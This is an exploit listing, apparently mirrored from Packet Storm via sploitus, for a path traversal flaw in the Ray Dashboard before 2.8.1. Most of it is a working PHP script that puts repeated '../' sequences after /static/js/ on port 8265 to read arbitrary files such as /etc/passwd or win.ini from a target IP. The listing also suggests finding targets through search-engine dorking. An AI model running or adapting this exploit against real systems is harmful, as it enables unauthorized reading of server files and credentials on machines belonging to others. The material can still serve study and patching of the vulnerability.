Share
## https://sploitus.com/exploit?id=PACKETSTORM:215801
=============================================================================================================================================
    | # Title     : Ray โ‰ค 2.8.0 Path Traversal Leading to Local File Disclosure                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://github.com/ray-project/ray                                                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: A Path Traversal vulnerability was identified in versions prior to 2.8.1 of Ray affecting the Ray Dashboard service (default port 8265).
                          The issue stems from improper validation and sanitization of user-supplied file paths within the static file handling mechanism. 
                          By manipulating path traversal sequences (e.g., ../), an attacker may access files outside the intended static directory.
     
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php
    
    [+] PayLoad :
    
    <?php
    
    
    if ($argc < 3) {
        echo "Usage: php ray_lfi.php <target_ip> <file_path>\n";
        echo "Example Linux: php ray_lfi.php 192.168.1.10 /etc/passwd\n";
        echo "Example Windows: php ray_lfi.php 192.168.1.10 C:/Windows/win.ini\n";
        exit;
    }
    
    $target = $argv[1];
    $file = $argv[2];
    $port = 8265;
    
    $payload = "/static/js/" . str_repeat("../", 15) . $file;
    
    $url = "http://{$target}:{$port}{$payload}";
    
    echo "[*] Target: $url\n";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code === 200 && !empty($response)) {
        echo "[+] File Retrieved Successfully:\n\n";
        echo $response . "\n";
    } else {
        echo "[-] Exploit failed or target not vulnerable.\n";
    }
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================